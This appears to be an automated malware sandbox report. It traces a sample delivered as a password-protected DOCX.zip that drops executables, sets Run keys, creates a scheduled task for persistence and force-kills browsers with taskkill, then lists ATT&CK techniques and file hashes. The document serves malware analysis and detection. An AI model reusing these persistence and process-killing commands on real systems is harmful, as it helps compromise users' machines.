C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2104,6269929522095797884,10735235077190262648,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4928 /prefetch:84⤵PID:2672
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2104,6269929522095797884,10735235077190262648,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4928 /prefetch:84⤵
- Suspicious behavior: EnumeratesProcesses
PID:2820
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,6269929522095797884,10735235077190262648,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3448 /prefetch:14⤵PID:2936
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,6269929522095797884,10735235077190262648,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3628 /prefetch:14⤵PID:2028
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2104,6269929522095797884,10735235077190262648,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5168 /prefetch:84⤵PID:4564
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,6269929522095797884,10735235077190262648,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5708 /prefetch:14⤵PID:688
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2104,6269929522095797884,10735235077190262648,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5928 /prefetch:84⤵
- Suspicious behavior: EnumeratesProcesses
PID:1260
-
-
-
C:\Windows\system32\timeout.exetimeout /t 153⤵
- Delays execution with timeout.exe
PID:1952
-
-
C:\Program Files\7-Zip\7z.exe"C:\Program Files\7-Zip\7z.exe" x "C:\Users\Admin\Downloads\DOCX.zip" -o"C:\Users\Admin\Downloads" -pFuckSyrialAndFreePsAndFreeSyria009633⤵
- Suspicious use of AdjustPrivilegeToken
PID:2244
-
-
C:\Windows\system32\timeout.exetimeout /t 153⤵
- Delays execution with timeout.exe
PID:5092
-
-
C:\Users\Admin\AppData\Local\Temp\Startup\DOCX.exe"C:\Users\Admin\AppData\Local\Temp\Startup\DOCX.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:3000 -
C:\Users\Admin\AppData\Local\Temp\._cache_DOCX.exe"C:\Users\Admin\AppData\Local\Temp\._cache_DOCX.exe"4⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
PID:4752 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn TGWEKK.exe /tr C:\Users\Admin\AppData\Roaming\Windata\XVZBZS.exe /sc minute /mo 15⤵
- System Location Discovery: System Language Discovery
PID:1780 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn TGWEKK.exe /tr C:\Users\Admin\AppData\Roaming\Windata\XVZBZS.exe /sc minute /mo 16⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2748
-
-
-
C:\Windows\SysWOW64\WSCript.exeWSCript C:\Users\Admin\AppData\Local\Temp\TGWEKK.vbs5⤵
- System Location Discovery: System Language Discovery
PID:1800
-
-
-
C:\ProgramData\Synaptics\Synaptics.exe"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate4⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:2560 -
C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe"C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe" InjUpdate5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1812
-
-
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM chrome.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4568
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM firefox.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3688
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM msedge.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2504
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM iexplore.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3316
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM opera.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1472
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM safari.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2260
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM brave.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3612
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM vivaldi.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3248
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM epic.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4392
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM yandex.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4724
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM tor.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3436
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM CMD.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1724
-
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4216
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4420
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:760
-
C:\Users\Admin\AppData\Roaming\Windata\XVZBZS.exeC:\Users\Admin\AppData\Roaming\Windata\XVZBZS.exe1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2908
-
C:\Users\Admin\AppData\Roaming\Windata\XVZBZS.exeC:\Users\Admin\AppData\Roaming\Windata\XVZBZS.exe1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4312
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Hijack Execution Flow
1Executable Installer File Permissions Weakness
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Hijack Execution Flow
1Executable Installer File Permissions Weakness
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Hijack Execution Flow
1Executable Installer File Permissions Weakness
1Impair Defenses
1Disable or Modify Tools
1Modify Registry
3Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
Filesize
152B
MD537f660dd4b6ddf23bc37f5c823d1c33a
SHA11c35538aa307a3e09d15519df6ace99674ae428b
SHA2564e2510a1d5a50a94fe4ce0f74932ab780758a8cbdc6d176a9ce8ab92309f26f8
SHA512807b8b8dc9109b6f78fc63655450bf12b9a006ff63e8f29ade8899d45fdf4a6c068c5c46a3efbc4232b9e1e35d6494f00ded5cdb3e235c8a25023bfbd823992d
-
Filesize
152B
MD5d7cb450b1315c63b1d5d89d98ba22da5
SHA1694005cd9e1a4c54e0b83d0598a8a0c089df1556
SHA25638355fd694faf1223518e40bac1996bdceaf44191214b0a23c4334d5fb07d031
SHA512df04d4f4b77bae447a940b28aeac345b21b299d8d26e28ecbb3c1c9e9a0e07c551e412d545c7dbb147a92c12bad7ae49ac35af021c34b88e2c6c5f7a0b65f6a8
-
Filesize
5KB
MD5c4792892317a1a8ddc415690716d65ce
SHA1919981817f1c00da397954dec62f387c9d67c3a3
SHA25673b6ea0e7f64c0489667d3d56e8fdbe3493197da4b6309e4154ea44e57c899e8
SHA512940794ec5e35b53132ceb3cca5f9570295c19906a5056144ca0d62e06eeb6da76a39607d0e6269d2261fc83599b10d30fafaa79eb3dbe9a6531d486c54cc614d
-
Filesize
6KB
MD518d5a3dc5790bf30c5bbbef0798d66fc
SHA10dc9fa989ba25a7620e8c54cb4e734583c0b0ccb
SHA256e716029bddb51894a826f9a8ebf98692e2152d8ce19012d1fc8017e6c2e9cb44
SHA5128d0321914d3bba8b1bc990c03cdca15147cd56701436f5496a3e5eb888e8ef21f12a5363335e75bebc962103e988105077991f67e5b9fb4eddcd9d751a29211f
-
Filesize
16B
MD56752a1d65b201c13b62ea44016eb221f
SHA158ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA2560861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA5129cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389
-
Filesize
10KB
MD52e8bc4a5446ccffd2b366c5f251d98d2
SHA106d9e2931ed3f178a5a45ef3f0f78586138d13a3
SHA2566f9ba352d7d2cd92cf56599aaa259cee30fd1e64ea45adce413fd41d43b76e32
SHA5127e94a60a8ebaf9ee4c1f1361eaf0bf3eaab2919e572fb00b8348879b292a45c2d541aa52f8d522e0765dcd68c45f963a5017540a37fa9c79e49624081d2abc1e
-
C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\9cd93bc6dcf544bae69531052e64647ec02f2bb4.tbres
Filesize4KB
MD5d109b0e2f1a142a0a87ee88c11249fa2
SHA1eeecfcf8ce90e8296a704044ef68d3d7dc7488e6
SHA25610271f9ab3425809529ede9160b3cd01243492dc78d0b69e28a4e3525e4ba7ea
SHA5125a23973080582533f4d05c5c41bbe319d8839f94b628f0e12f356f666830e866bc656100df126a64591e10efdfd375cca335a73029a32ce8c7757d6e38856149
-
Filesize
944B
MD534f595487e6bfd1d11c7de88ee50356a
SHA14caad088c15766cc0fa1f42009260e9a02f953bb
SHA2560f9a4b52e01cb051052228a55d0515911b7ef5a8db3cf925528c746df511424d
SHA51210976c5deaf9fac449e703e852c3b08d099f430de2d7c7b8e2525c35d63e28b890e5aab63feff9b20bca0aaf9f35a3ba411aee3fbeee9ea59f90ed25bd617a0b
-
Filesize
944B
MD522310ad6749d8cc38284aa616efcd100
SHA1440ef4a0a53bfa7c83fe84326a1dff4326dcb515
SHA25655b1d8021c4eb4c3c0d75e3ed7a4eb30cd0123e3d69f32eeb596fe4ffec05abf
SHA5122ef08e2ee15bb86695fe0c10533014ffed76ececc6e579d299d3365fafb7627f53e32e600bb6d872b9f58aca94f8cb7e1e94cdfd14777527f7f0aa019d9c6def
-
Filesize
944B
MD54fc1ceefa94c82f73b7ee478e2920ea3
SHA117a031c8d10e316478d85d24ba8a8b5ebfda3149
SHA256018553e7801fd476285775a4df59eb6a6c79774f6253d6dcbe9e4e96de3c96fb
SHA512cd581f4b96e1eff3e1c8e75e9e67050060f9bdc92c2a4a0ca8282b4b1839fde9f7848cc262b8ef189466bdd51c0940be7392ae7f0278b2113d10ed590d11b311
-
Filesize
1KB
MD508f9f3eb63ff567d1ee2a25e9bbf18f0
SHA16bf06056d1bb14c183490caf950e29ac9d73643a
SHA25682147660dc8d3259f87906470e055ae572c1681201f74989b08789298511e5f0
SHA512425a4a8babbc11664d9bac3232b42c45ce8430b3f0b2ae3d9c8e12ad665cd4b4cbae98280084ee77cf463b852309d02ca43e5742a46c842c6b00431fc047d512
-
Filesize
1KB
MD5bb399bb581675c7a4ea8e6d1b684ea93
SHA13b3b187d6d27ba0cf0767296b1d4c442cd121dce
SHA2566f8ac41385bb99c3fcba58c015a4c2a6c096d0b6a25bbea4dd7375c3e2b64e83
SHA512dafecabbcb9205438f2ef3d8b0d772e47e228921ee00ee07521847c380b47ed31897b85f383eab76b82fe72098f79e73f6fb5877ac5e775b2b40e8387fca98d3
-
Filesize
944B
MD5fe32430ab97c0308ed326ed9a7dd94d1
SHA17f10913ddfec7fd269da79de83156cd07623410a
SHA25674ce5bee24a7c0a66983eea9391cb607f1d15d2c30a633a259b9517804ebe7a0
SHA512a38c58cca3c40cea8995f3fa50d32035366d1d990ce264557af1a3cad2eb39023433f9ac362f2ae67d25ce1a8bd76d1cb2444d3a2fc1d24df465490bbcb6c839
-
Filesize
944B
MD52414198488c434d42d9a1ccda60d1f77
SHA12fb9f28bee397d29a457e326970644d03763f238
SHA2569da692fc5bc13f8ed86e57d6e05e0796e7fea900d431fd25a40f0c0c2957552a
SHA5121c0fbe9ba6a2d3d936ed484bcf5829e91e9137b41a4b150b62bf46f73a6fe055adde58f18a247e7f9a8f5ab36fdfd0221e6e0d92eec7e5b74d99f028b93b9623
-
Filesize
917KB
MD514ae5a17618d08f48a350e9496c2c959
SHA1678bea5c7d0bb18d0dcab46c646536de5a51d24f
SHA25636dac4b76a8c3ea977d141ee3df142383efa9b0bc24d19da949d106d0b602207
SHA512fca819082bd9479a7d8bcf27203f4a832e6148dc44655463a28490ca3c3f39f5d1d5ae57f6c235a03fca136b6e315338e776040d1ad18eb200d3953e73d464c2
-
Filesize
24KB
MD5f4bb59047f006fb2fed60631855e5d03
SHA13256c0122206b47a302e614324a9d69e75ee3f97
SHA25644e28bae578bac799c2e30fce913de3fb6c87b8d2d308b49faaa269287a01b9f
SHA5122733b6a4d9ad491fe2b178e78c63ae8194a89aec9c34bbc7eb704c7c28cc6421bbf4f7bec3147336e1141943249b5022a8acc0c21fbc0cfee618000ed6d06f9d
-
Filesize
1KB
MD545a66afa3b07b3143f0d0c3515898bae
SHA1cc5baf0c4d2fc0b034974786f20087e058915693
SHA2568a8c558b5cb169e5d2967dc3e69cb26174bdd8d457903f074477ef1c555b4fb6
SHA51204aee35c068225ec8982fc273fd4e4e172cf336b26561d5b8c7ccf3fe972c485b962d01bdcfab2a27fe456364114417dc3c44852d8431def9a04812e8008106f
-
Filesize
17KB
MD5e566fc53051035e1e6fd0ed1823de0f9
SHA100bc96c48b98676ecd67e81a6f1d7754e4156044
SHA2568e574b4ae6502230c0829e2319a6c146aebd51b7008bf5bbfb731424d7952c15
SHA512a12f56ff30ea35381c2b8f8af2446cf1daa21ee872e98cad4b863db060acd4c33c5760918c277dadb7a490cb4ca2f925d59c70dc5171e16601a11bc4a6542b04
-
Filesize
844B
MD587c2fe360d7d70c430a6a914e00eb4a4
SHA13f014ac92386d9e5f5458c23837cd108e2440c8d
SHA25655dbc17961004caaec6adb4ac282818b533b141e4b8548fc3a88f73c6b8c20f0
SHA512794139f40c2a0d2609a2119cf4752c6b9c0a7279ae5348470c59305394569d2204c1f2c05584947ed475265e6f009a98479353b12f383e5134f3deb97e9ab2ce
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
1.6MB
MD5a0177c0a9f2254179b112eecf3c58cc6
SHA103478f572f818c8ffd7f8ebe23632432e82e4461
SHA25655d2bea108eeaabcdf59d449cf15f0efabb59e243d9bd91ff0b0805cd3d133df
SHA5120247f803d5018659899766fe8758c14081b1fe9f414c2afb8f34e78569bf5e9063b746c3adf388b60017367070582e7d8b9422ae94bcef4c8c0d39fa7e4a4470
-
Filesize
1.2MB
MD5f5ab8279f54707922e6ae1f83b93478a
SHA1528cf2ac4df0aeb4ecac7e989b06f7461d24ea3c
SHA256d7c01f4991abc009f182b7dd457da87deca1c3a4db05b25d4f1b058fcc8a8339
SHA5129a0832e381f9407049f33a0ef86e96b924253dd6f7e42c20514a49528bc7bd024767dd4b06c10edf98fe5ae90bd48109fbca1a820dd8428ea22a3f68e9d9dab1